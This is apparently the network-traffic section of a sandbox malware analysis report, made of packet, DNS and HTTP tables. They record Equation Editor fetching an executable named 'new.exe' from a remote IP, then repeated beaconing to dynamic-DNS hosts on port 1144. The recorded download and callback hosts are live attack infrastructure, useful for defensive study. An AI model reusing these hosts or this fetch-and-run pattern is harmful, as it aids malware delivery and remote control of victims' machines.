                                                                  Jun 9, 2021 08:04:58.303574085 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303577900 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303596973 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303610086 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303620100 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303622961 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303643942 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303663015 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303664923 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303674936 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303689957 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303692102 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303714991 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303729057 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303740025 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303749084 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303766012 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303772926 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303788900 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303796053 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303811073 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303821087 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303834915 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303837061 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303858042 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303868055 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303883076 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303884029 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303906918 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303919077 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303929090 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303931952 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303951025 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303966999 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303973913 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.303982019 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.303996086 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304007053 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304017067 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304027081 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304039001 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304065943 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304066896 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304075003 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304089069 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304100037 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304111004 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304114103 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304137945 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304142952 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304162979 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304167986 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304183006 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304204941 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304205894 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304217100 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304229975 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304240942 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304255009 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.304255962 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:58.304287910 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.305131912 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:58.945753098 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:05:29.047336102 CEST491681144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:29.089657068 CEST11444916879.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:29.587378025 CEST491681144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:29.629785061 CEST11444916879.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:30.133435965 CEST491681144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:30.175765038 CEST11444916879.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:34.346832991 CEST491691144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:34.389161110 CEST11444916979.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:34.891967058 CEST491691144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:34.936095953 CEST11444916979.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:35.437943935 CEST491691144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:35.482548952 CEST11444916979.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:39.610323906 CEST491701144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:39.652671099 CEST11444917079.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:40.165189028 CEST491701144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:40.207597971 CEST11444917079.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:40.711241961 CEST491701144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:40.753782988 CEST11444917079.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:57.866432905 CEST491711144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:57.908870935 CEST11444917179.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:58.418828964 CEST491711144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:58.461251974 CEST11444917179.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:05:58.964834929 CEST491711144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:05:59.007404089 CEST11444917179.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:03.081196070 CEST491721144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:03.123518944 CEST11444917279.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:03.629585028 CEST491721144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:03.671880960 CEST11444917279.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:04.175756931 CEST491721144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:04.218075037 CEST11444917279.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:08.303108931 CEST491731144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:08.347553968 CEST11444917379.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:08.856086969 CEST491731144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:08.898592949 CEST11444917379.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:09.402173996 CEST491731144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:09.444685936 CEST11444917379.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:26.455214024 CEST491741144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:26.497498035 CEST11444917479.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:27.000433922 CEST491741144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:27.045032978 CEST11444917479.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:27.546580076 CEST491741144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:27.591068983 CEST11444917479.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:31.707674026 CEST491751144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:31.752058029 CEST11444917579.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:32.258193970 CEST491751144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:32.300652981 CEST11444917579.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:32.804261923 CEST491751144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:32.846956968 CEST11444917579.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:36.924474001 CEST491761144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:36.968739033 CEST11444917679.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:37.484741926 CEST491761144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:37.529133081 CEST11444917679.134.225.90192.168.2.22
                                                                  Jun 9, 2021 08:06:38.046277046 CEST491761144192.168.2.2279.134.225.90
                                                                  Jun 9, 2021 08:06:38.088762999 CEST11444917679.134.225.90192.168.2.22

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 9, 2021 08:05:28.973939896 CEST5219753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:29.020330906 CEST53521978.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:34.258011103 CEST5309953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:34.302454948 CEST53530998.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:34.302964926 CEST5309953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:34.345746040 CEST53530998.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:39.508816957 CEST5283853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:39.553456068 CEST53528388.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:39.564157009 CEST5283853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:39.609002113 CEST53528388.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:44.790477991 CEST6120053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:44.835094929 CEST53612008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:44.879162073 CEST4954853192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:44.921695948 CEST53495488.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:45.024209976 CEST4954853192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:45.068455935 CEST53495488.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:45.136424065 CEST5562753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:45.181301117 CEST53556278.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.244317055 CEST5600953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.287616968 CEST53560098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.288036108 CEST5600953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.332956076 CEST53560098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.374538898 CEST6186553192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:49.419663906 CEST53618658.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:49.429322004 CEST5517153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.472683907 CEST53551718.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.473159075 CEST5517153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.518783092 CEST53551718.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.554864883 CEST5249653192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.599143982 CEST53524968.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.629894018 CEST5756453192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:53.672451019 CEST53575648.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:53.681068897 CEST6300953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.725708961 CEST53630098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.726066113 CEST6300953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.769005060 CEST53630098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:57.819849968 CEST5931953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:57.864238024 CEST53593198.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:03.036978960 CEST5307053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:03.079896927 CEST53530708.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:08.258384943 CEST5977053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:08.301292896 CEST53597708.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.473875999 CEST6152353192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.516377926 CEST53615238.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.517004967 CEST6152353192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.559509993 CEST53615238.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.583936930 CEST6279153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:13.628263950 CEST53627918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:13.628712893 CEST6279153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:13.671596050 CEST53627918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:13.718298912 CEST5066753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.761213064 CEST53506678.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.805857897 CEST5412953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:17.850658894 CEST53541298.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.881568909 CEST6532953192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:17.925237894 CEST53653298.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:17.931976080 CEST6071853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:17.976290941 CEST53607188.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.976998091 CEST6071853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:18.019859076 CEST53607188.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:22.055557013 CEST4915753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:22.098540068 CEST53491578.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:22.135066032 CEST5739153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:22.178117037 CEST53573918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:22.270802021 CEST6185853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:22.313879013 CEST53618588.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:26.361294031 CEST6250053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:26.405859947 CEST53625008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:26.406435013 CEST6250053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:26.453803062 CEST53625008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:31.619246006 CEST5165253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:31.662369013 CEST53516528.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:31.662908077 CEST5165253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:31.705940962 CEST53516528.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:36.878632069 CEST6276253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:36.923249960 CEST53627628.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:42.094835997 CEST5690553192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:42.137829065 CEST53569058.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:42.142875910 CEST5460953192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:42.190478086 CEST53546098.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:42.193797112 CEST5810153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:42.237989902 CEST53581018.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jun 9, 2021 08:05:28.973939896 CEST192.168.2.228.8.8.80x3a4cStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.258011103 CEST192.168.2.228.8.8.80xb4c8Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.302964926 CEST192.168.2.228.8.8.80xb4c8Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.508816957 CEST192.168.2.228.8.8.80x2426Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.564157009 CEST192.168.2.228.8.8.80x2426Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:44.790477991 CEST192.168.2.228.8.8.80x325cStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:44.879162073 CEST192.168.2.228.8.4.40x7905Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:45.024209976 CEST192.168.2.228.8.4.40x7905Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:45.136424065 CEST192.168.2.228.8.8.80xc2b2Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.244317055 CEST192.168.2.228.8.8.80xa796Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.288036108 CEST192.168.2.228.8.8.80xa796Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.374538898 CEST192.168.2.228.8.4.40x7d97Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.429322004 CEST192.168.2.228.8.8.80xd791Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.473159075 CEST192.168.2.228.8.8.80xd791Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.554864883 CEST192.168.2.228.8.8.80x9ffaStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.629894018 CEST192.168.2.228.8.4.40xc765Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.681068897 CEST192.168.2.228.8.8.80x4f70Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.726066113 CEST192.168.2.228.8.8.80x4f70Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:57.819849968 CEST192.168.2.228.8.8.80x27afStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:03.036978960 CEST192.168.2.228.8.8.80x1e37Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:08.258384943 CEST192.168.2.228.8.8.80x2457Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.473875999 CEST192.168.2.228.8.8.80x876dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.517004967 CEST192.168.2.228.8.8.80x876dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.583936930 CEST192.168.2.228.8.4.40x9519Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.628712893 CEST192.168.2.228.8.4.40x9519Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.718298912 CEST192.168.2.228.8.8.80xd1b4Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.805857897 CEST192.168.2.228.8.8.80x1ce0Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.881568909 CEST192.168.2.228.8.4.40x5286Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.931976080 CEST192.168.2.228.8.8.80x5ed5Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.976998091 CEST192.168.2.228.8.8.80x5ed5Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.055557013 CEST192.168.2.228.8.8.80x352fStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.135066032 CEST192.168.2.228.8.4.40x8423Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.270802021 CEST192.168.2.228.8.8.80x64dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.361294031 CEST192.168.2.228.8.8.80xe85aStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.406435013 CEST192.168.2.228.8.8.80xe85aStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.619246006 CEST192.168.2.228.8.8.80xfcdfStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.662908077 CEST192.168.2.228.8.8.80xfcdfStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:36.878632069 CEST192.168.2.228.8.8.80xbf52Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.094835997 CEST192.168.2.228.8.8.80xbf28Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.142875910 CEST192.168.2.228.8.4.40x3a49Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.193797112 CEST192.168.2.228.8.8.80x474aStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jun 9, 2021 08:05:29.020330906 CEST8.8.8.8192.168.2.220x3a4cNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.302454948 CEST8.8.8.8192.168.2.220xb4c8No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.345746040 CEST8.8.8.8192.168.2.220xb4c8No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.553456068 CEST8.8.8.8192.168.2.220x2426No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.609002113 CEST8.8.8.8192.168.2.220x2426No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:57.864238024 CEST8.8.8.8192.168.2.220x27afNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:03.079896927 CEST8.8.8.8192.168.2.220x1e37No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:08.301292896 CEST8.8.8.8192.168.2.220x2457No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.405859947 CEST8.8.8.8192.168.2.220xe85aNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.453803062 CEST8.8.8.8192.168.2.220xe85aNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.662369013 CEST8.8.8.8192.168.2.220xfcdfNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.705940962 CEST8.8.8.8192.168.2.220xfcdfNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:36.923249960 CEST8.8.8.8192.168.2.220xbf52No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • 198.12.127.155

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249167198.12.127.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jun 9, 2021 08:04:57.065510035 CEST0OUTGET /new.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: 198.12.127.155
                                                                  Connection: Keep-Alive
                                                                  Jun 9, 2021 08:04:57.205565929 CEST1INHTTP/1.1 200 OK
                                                                  Date: Wed, 09 Jun 2021 06:04:57 GMT
                                                                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                  Last-Modified: Tue, 08 Jun 2021 22:22:11 GMT
                                                                  ETag: "b3400-5c44896d8ef42"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 734208
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-msdownload
